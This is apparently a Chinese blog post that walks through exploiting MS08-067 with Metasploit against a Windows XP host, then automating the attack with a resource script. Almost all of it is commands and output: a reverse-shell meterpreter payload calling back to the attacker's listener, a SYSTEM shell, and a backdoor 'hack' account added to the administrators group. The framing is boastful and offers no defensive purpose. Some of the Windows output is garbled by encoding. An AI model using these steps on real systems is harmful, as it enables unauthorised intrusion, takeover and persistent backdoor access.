Metasploit自动化攻击——装X必备
(1)首先进行一次普通渗透
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts
file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:2648) at 2021-06-04 18:01:33 +0800
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions -l -v
Active sessions
===============
Session ID: 1
Name:
Type: meterpreter windows
Info: NT AUTHORITY\SYSTEM @ WINXP-1
Tunnel: 192.168.1.113:4444 -> 192.168.1.106:2648 (192.168.1.106)
Via: exploit/windows/smb/ms08_067_netapi
Encrypted: Yes (AES-256-CBC)
UUID: 82804a20859da4c7/x86=1/windows=1/2021-06-04T10:01:31Z
CheckIn: 30s ago @ 2021-06-04 18:01:33 +0800
Registered: No
(2)写入脚本
┌──(root💀kali)-[~]
└─# echo use exploit/windows/smb/ms08_067_netapi > auto_exploit_winxp.rc
┌──(root💀kali)-[~]
└─# echo set rhosts 192.168.1.106 >> auto_exploit_winxp.rc
┌──(root💀kali)-[~]
└─# echo set target 34 >> auto_exploit_winxp.rc
┌──(root💀kali)-[~]
└─# echo exploit >> auto_exploit_winxp.rc
┌──(root💀kali)-[~]
└─# msfconsole
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.0.46-dev ]
+ -- --=[ 2135 exploits - 1140 auxiliary - 365 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View advanced module options with
advanced
msf6 > resource auto_exploit_winxp.rc
[*] Processing /root/auto_exploit_winxp.rc for ERB directives.
resource (/root/auto_exploit_winxp.rc)> use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (/root/auto_exploit_winxp.rc)> set rhosts 192.168.1.106
rhosts => 192.168.1.106
resource (/root/auto_exploit_winxp.rc)> set target 34
target => 34
resource (/root/auto_exploit_winxp.rc)> exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:2745) at 2021-06-04 18:08:10 +0800
meterpreter > uuid
[+] UUID: f31a23066f90ad37/x86=1/windows=1/2021-06-04T10:08:08Z
meterpreter > get system
[-] Unknown command: get.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > net user
[-] Unknown command: net.
meterpreter > shell
Process 1200 created.
Channel 1 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user
net user
\\ ���û��ʻ�
-------------------------------------------------------------------------------
__wfilterd_user Administrator Guest
HelpAssistant st21 SUPPORT_388945a0
�����������ϣ�������һ��������������
C:\WINDOWS\system32>net user hack hack /add
net user hack hack /add
�����ɹ����ɡ�
C:\WINDOWS\system32>net user
net user
\\ ���û��ʻ�
-------------------------------------------------------------------------------
__wfilterd_user Administrator Guest
hack HelpAssistant st21
SUPPORT_388945a0
�����������ϣ�������һ��������������
C:\WINDOWS\system32>net localgroup administrators hack /add
net localgroup administrators hack /add
�����ɹ����ɡ�
C:\WINDOWS\system32>net user hack
net user hack
�û��� hack
ȫ��
ע��
�û���ע��
����(����)���� 000 (ϵͳĬ��)
�ʻ����� Yes
�ʻ����� �Ӳ�
�ϴ��������� 2021/6/4 ���� 06:08
���뵽�� 2021/7/17 ���� 04:56
�����ɸ��� 2021/6/4 ���� 06:08
��Ҫ���� Yes
�û����Ը������� Yes
�����Ĺ���վ All
��¼�ű�
�û������ļ�
��Ŀ¼
�ϴε�¼ �Ӳ�
�������ĵ�¼Сʱ�� All
��������Ա *Administrators *Users
ȫ������Ա *None
�����ɹ����ɡ�
C:\WINDOWS\system32>
在命令端下使用echo写入命令,进入msfconsole使用resource 文件名 进行使用。
1015
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
